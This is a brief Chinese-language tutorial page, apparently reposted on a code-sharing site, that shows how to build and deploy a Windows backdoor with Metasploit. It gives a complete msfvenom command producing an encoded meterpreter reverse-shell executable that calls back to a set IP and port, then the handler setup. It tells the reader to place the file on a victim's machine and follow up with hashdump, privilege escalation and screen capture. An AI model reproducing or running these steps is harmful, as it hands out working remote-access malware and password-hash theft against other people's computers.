kali之msfconsole


1.啟動msfconsole命令模式
2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
3.啟動msfconsole命令模式 use exploit/multi/handler  使用handler這個模塊,set PAYLOAD windows/meterpreter/reverse_tcp   show options如果看到沒有熱河參數直接下一步(set LHOST=自己的ip set LPORT=端口),
  然后
 使用這個shellcode 然后show options 看到提示 LHOST LPORT 這里填生成木馬的自己的ip和端口 set LHOST 自己的ip 回車 然后set LPORT 端口
4.exploit 回車 然后等待目標點擊test.ext文件上線




1.執行以下命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
2.將test.exe復制到受害者主機上
3.在Kali中輸入msfconsole,並按照下圖進行配置:
4.執行exploit,然后在受害者主機上運行test.exe后門木馬,Metasploit接到反饋
   session
得到meterpreter后,可以執行getuid、hashdump以及提權操作,還可以通過getgui命令拿受害主機的圖形界面。




免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM